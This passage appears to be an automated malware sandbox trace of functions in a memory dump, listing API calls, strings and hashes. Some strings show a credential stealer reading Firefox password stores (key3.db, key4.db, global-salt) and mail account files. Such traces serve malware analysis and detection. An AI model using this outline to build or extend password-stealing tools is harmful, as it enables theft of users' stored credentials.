                                                                                                                  • strlen.MSVCRT ref: 00406BFF
                                                                                                                  • strlen.MSVCRT ref: 00406C0D
                                                                                                                  • strlen.MSVCRT ref: 00406BA7
                                                                                                                    • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$_mbscat_mbscpymemset
                                                                                                                  • String ID: key3.db$key4.db
                                                                                                                  • API String ID: 581844971-3557030128
                                                                                                                  • Opcode ID: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                  • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                                                                                                  • Opcode Fuzzy Hash: 2f8350c5d3847b8345184316588304a55230d418217e1ade242334758e746451
                                                                                                                  • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                  • String ID: 0$6
                                                                                                                  • API String ID: 2300387033-3849865405
                                                                                                                  • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                  • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                                  • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                                  • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004076D7
                                                                                                                  • sprintf.MSVCRT ref: 00407704
                                                                                                                  • strlen.MSVCRT ref: 00407710
                                                                                                                  • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                  • strlen.MSVCRT ref: 00407733
                                                                                                                  • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpystrlen$memsetsprintf
                                                                                                                  • String ID: %s (%s)
                                                                                                                  • API String ID: 3756086014-1363028141
                                                                                                                  • Opcode ID: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                  • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                                                                                                  • Opcode Fuzzy Hash: cc2bd41a4fb043a9adc204159eccb481c7ad7d468cc7944e47e0de50e31d920c
                                                                                                                  • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                                                                                                  APIs
                                                                                                                  • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                  • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                  • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                  Strings
                                                                                                                  • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                                  • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                                  • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                                  • API String ID: 1640410171-3316789007
                                                                                                                  • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                  • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                                                                                                  • Opcode Fuzzy Hash: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                                                                                                  • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscat$memsetsprintf
                                                                                                                  • String ID: %2.2X
                                                                                                                  • API String ID: 125969286-791839006
                                                                                                                  • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                  • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                                  • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                                  • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                    • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                    • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                    • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                    • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                    • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                    • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                    • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                  • String ID: ACD
                                                                                                                  • API String ID: 1886237854-620537770
                                                                                                                  • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                  • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                                  • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                                  • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 004091EC
                                                                                                                  • sprintf.MSVCRT ref: 00409201
                                                                                                                    • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                    • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                    • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                  • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                  • String ID: caption$dialog_%d
                                                                                                                  • API String ID: 2923679083-4161923789
                                                                                                                  • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                  • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                                  • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                                  • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                                  Strings
                                                                                                                  • abort due to ROLLBACK, xrefs: 00428781
                                                                                                                  • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                                  • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                                  • no such savepoint: %s, xrefs: 00426A02
                                                                                                                  • unknown error, xrefs: 004277B2
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                                  • API String ID: 3510742995-3035234601
                                                                                                                  • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                  • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                                                                                                  • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                                                                                                  • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset
                                                                                                                  • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                                  • API String ID: 2221118986-3608744896
                                                                                                                  • Opcode ID: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                  • Instruction ID: b2162d4513fc51f5474afcad34877166e8d447bb02b269bc62d34bb3a2ce53bd
                                                                                                                  • Opcode Fuzzy Hash: c279ee0335eef82b4ab2e1c99c3cadbe08c20cbdf424610957809e88121f4575
                                                                                                                  • Instruction Fuzzy Hash: 43B157B16087118FC720CF29E580A1BB7E5FF88314F90495FE9998B751E738E841CB9A
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                                    • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmpmemcpy
                                                                                                                  • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                                  • API String ID: 1784268899-4153596280
                                                                                                                  • Opcode ID: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                  • Instruction ID: 8c81c6e629260c6e32056db5335e0b2518b1498a844935eff1e92b421965135b
                                                                                                                  • Opcode Fuzzy Hash: ad1bb3be98cb8143327a8bba99d80b2cd1d250b2812bf04c93ad8184def5b6bb
                                                                                                                  • Instruction Fuzzy Hash: 8391F3B1A007009FE730EF25C981B5FBBE4AB44304F50492FF4569B392D7B9E9458B99
                                                                                                                  APIs
                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                                  • memset.MSVCRT ref: 00410246
                                                                                                                  • memset.MSVCRT ref: 00410258
                                                                                                                    • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                  • memset.MSVCRT ref: 0041033F
                                                                                                                  • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                  • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3974772901-0
                                                                                                                  • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                  • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                                  • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                                  • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                                  APIs
                                                                                                                  • wcslen.MSVCRT ref: 0044406C
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                  • strlen.MSVCRT ref: 004440D1
                                                                                                                    • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                    • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                  • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 577244452-0
                                                                                                                  • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                  • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                                  • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                                  • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                    • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                  • _strcmpi.MSVCRT ref: 00404518
                                                                                                                  • _strcmpi.MSVCRT ref: 00404536
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcmpi$memcpystrlen
                                                                                                                  • String ID: imap$pop3$smtp
                                                                                                                  • API String ID: 2025310588-821077329
                                                                                                                  • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                  • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                                  • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                                  • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040C02D
                                                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76270A60), ref: 00408EBE
                                                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408E31
                                                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                    • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                    • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                    • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                    • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                    • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                  • API String ID: 2726666094-3614832568
                                                                                                                  • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                  • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                                  • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                                  • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00403A88
                                                                                                                  • memset.MSVCRT ref: 00403AA1
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF), ref: 00403AB8
                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00403AD7
                                                                                                                  • strlen.MSVCRT ref: 00403AE9
                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00403AFA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ByteCharMultiWidememset$FileWritestrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1786725549-0
                                                                                                                  • Opcode ID: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                  • Instruction ID: 75a67b34ad05bb499385cce9778aa698b1b4849105f4284936cacb9952f60aa3
                                                                                                                  • Opcode Fuzzy Hash: 8b1d9e4dc4f74ac6a4b9f20da3a4dce8e7e5bfac1d9ec588bc9247bb7228e3eb
                                                                                                                  • Instruction Fuzzy Hash: 291121B680112CBEFB119BA4DCC5EEB73ADDF09355F0005A6B715D2092E6349F448B78
                                                                                                                  APIs
                                                                                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                  • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                  • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                  • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2014771361-0
                                                                                                                  • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                  • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                                  • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                                  • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                                  APIs
                                                                                                                  • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                    • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                    • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                    • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                  • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                  • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                  • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcmp$memcpy
                                                                                                                  • String ID: global-salt$password-check
                                                                                                                  • API String ID: 231171946-3927197501
                                                                                                                  • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                  • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                                  • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                                  • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                                  APIs
